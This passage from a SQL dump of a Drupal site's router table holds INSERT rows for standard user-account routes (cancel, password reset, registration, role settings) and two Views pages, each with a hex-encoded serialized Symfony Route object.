('user.multiple_cancel_confirm', '/admin/people/cancel', '/admin/people/cancel', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f70656f706c652f63616e63656c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34333a225c44727570616c5c757365725c466f726d5c557365724d756c7469706c6543616e63656c436f6e6669726d223b733a363a225f7469746c65223b733a31313a2243616e63656c2075736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207573657273223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f70656f706c652f63616e63656c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f70656f706c652f63616e63656c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f70656f706c652f63616e63656c223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('user.page', '/user', '/user', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a353a222f75736572223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a7573657250616765223b733a363a225f7469746c65223b733a31303a224d79206163636f756e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31383a225f757365725f69735f6c6f676765645f696e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e757365722e6c6f67696e5f737461747573223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31323a227b5e2f75736572247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a353a222f75736572223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('user.pass', '/user/password', '/user/password', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f757365722f70617373776f7264223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33343a225c44727570616c5c757365725c466f726d5c5573657250617373776f7264466f726d223b733a363a225f7469746c65223b733a31393a22526573657420796f75722070617373776f7264223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31393a225f6d61696e74656e616e63655f616363657373223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f757365722f70617373776f7264247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f757365722f70617373776f7264223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f757365722f70617373776f7264223b733a383a226e756d5061727473223b693a323b7d7d, 2);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('user.pass.http', '/user/password', '/user/password', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f757365722f70617373776f7264223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36373a225c44727570616c5c757365725c436f6e74726f6c6c65725c5573657241757468656e7469636174696f6e436f6e74726f6c6c65723a3a726573657450617373776f7264223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a373a225f616363657373223b733a343a2254525545223b733a373a225f666f726d6174223b733a343a226a736f6e223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a313a7b693a303b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f757365722f70617373776f7264247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f757365722f70617373776f7264223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f757365722f70617373776f7264223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('user.register', '/user/register', '/user/register', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f757365722f7265676973746572223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31333a22757365722e7265676973746572223b733a363a225f7469746c65223b733a31383a22437265617465206e6577206163636f756e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f6163636573735f757365725f7265676973746572223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e757365722e7265676973746572223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f757365722f7265676973746572247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f757365722f7265676973746572223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f757365722f7265676973746572223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('user.reset', '/user/reset/{uid}/{timestamp}/{hash}', '/user/reset/%/%/%', 24, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f757365722f72657365742f7b7569647d2f7b74696d657374616d707d2f7b686173687d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34393a225c44727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a726573657450617373223b733a363a225f7469746c65223b733a31343a2252657365742070617373776f7264223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31393a225f6d61696e74656e616e63655f616363657373223b623a313b733a383a226e6f5f6361636865223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a333a22756964223b693a313b733a393a2274696d657374616d70223b693a323b733a343a2268617368223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f757365722f72657365742f283f503c7569643e5b5e2f5d2b2b292f283f503c74696d657374616d703e5b5e2f5d2b2b292f283f503c686173683e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2268617368223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a2274696d657374616d70223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a22756964223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f757365722f7265736574223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a333a22756964223b693a313b733a393a2274696d657374616d70223b693a323b733a343a2268617368223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32343b733a31343a227061747465726e4f75746c696e65223b733a31373a222f757365722f72657365742f252f252f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('user.reset.form', '/user/reset/{uid}', '/user/reset/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31373a222f757365722f72657365742f7b7569647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a676574526573657450617373466f726d223b733a363a225f7469746c65223b733a31343a2252657365742070617373776f7264223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31383a225f757365725f69735f6c6f676765645f696e223b733a353a2246414c5345223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31393a225f6d61696e74656e616e63655f616363657373223b623a313b733a383a226e6f5f6361636865223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e757365722e6c6f67696e5f737461747573223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a333a22756964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f757365722f72657365742f283f503c7569643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a22756964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f757365722f7265736574223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a333a22756964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31333a222f757365722f72657365742f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('user.reset.login', '/user/reset/{uid}/{timestamp}/{hash}/login', '/user/reset/%/%/%/login', 49, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f757365722f72657365742f7b7569647d2f7b74696d657374616d707d2f7b686173687d2f6c6f67696e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a7265736574506173734c6f67696e223b733a363a225f7469746c65223b733a31343a2252657365742070617373776f7264223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31383a225f757365725f69735f6c6f676765645f696e223b733a353a2246414c5345223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31393a225f6d61696e74656e616e63655f616363657373223b623a313b733a383a226e6f5f6361636865223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e757365722e6c6f67696e5f737461747573223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a333a22756964223b693a313b733a393a2274696d657374616d70223b693a323b733a343a2268617368223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37393a227b5e2f757365722f72657365742f283f503c7569643e5b5e2f5d2b2b292f283f503c74696d657374616d703e5b5e2f5d2b2b292f283f503c686173683e5b5e2f5d2b2b292f6c6f67696e247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6c6f67696e223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2268617368223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a2274696d657374616d70223b693a343b623a313b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a22756964223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f757365722f7265736574223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a333a22756964223b693a313b733a393a2274696d657374616d70223b693a323b733a343a2268617368223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a34393b733a31343a227061747465726e4f75746c696e65223b733a32333a222f757365722f72657365742f252f252f252f6c6f67696e223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('user.role.settings', '/admin/people/role-settings', '/admin/people/role-settings', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32373a222f61646d696e2f70656f706c652f726f6c652d73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33343a225c44727570616c5c757365725c466f726d5c526f6c6553657474696e6773466f726d223b733a363a225f7469746c65223b733a31333a22526f6c652073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f61646d696e2f70656f706c652f726f6c655c2d73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f70656f706c652f726f6c652d73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32373a222f61646d696e2f70656f706c652f726f6c652d73657474696e6773223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('user.role_add', '/admin/people/roles/add', '/admin/people/roles/add', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32333a222f61646d696e2f70656f706c652f726f6c65732f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a22757365725f726f6c652e64656661756c74223b733a363a225f7469746c65223b733a383a2241646420726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33303a227b5e2f61646d696e2f70656f706c652f726f6c65732f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32333a222f61646d696e2f70656f706c652f726f6c65732f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32333a222f61646d696e2f70656f706c652f726f6c65732f616464223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('user.well-known.change_password', '/.well-known/change-password', '/.well-known/change-password', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f2e77656c6c2d6b6e6f776e2f6368616e67652d70617373776f7264223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a757365724564697450616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31383a225f757365725f69735f6c6f676765645f696e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e757365722e6c6f67696e5f737461747573223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f5c2e77656c6c5c2d6b6e6f776e2f6368616e67655c2d70617373776f7264247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f2e77656c6c2d6b6e6f776e2f6368616e67652d70617373776f7264223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a32383a222f2e77656c6c2d6b6e6f776e2f6368616e67652d70617373776f7264223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('view.activity.page_1', '/activities', '/activities', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31313a222f61637469766974696573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a383a226163746976697479223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31383a227b5e2f61637469766974696573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f61637469766974696573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a31313a222f61637469766974696573223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('view.announcement.page_1', '/announcement', '/announcement', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31333a222f616e6e6f756e63656d656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a31323a22616e6e6f756e63656d656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32303a227b5e2f616e6e6f756e63656d656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f616e6e6f756e63656d656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a31333a222f616e6e6f756e63656d656e74223b733a383a226e756d5061727473223b693a313b7d7d, 1),
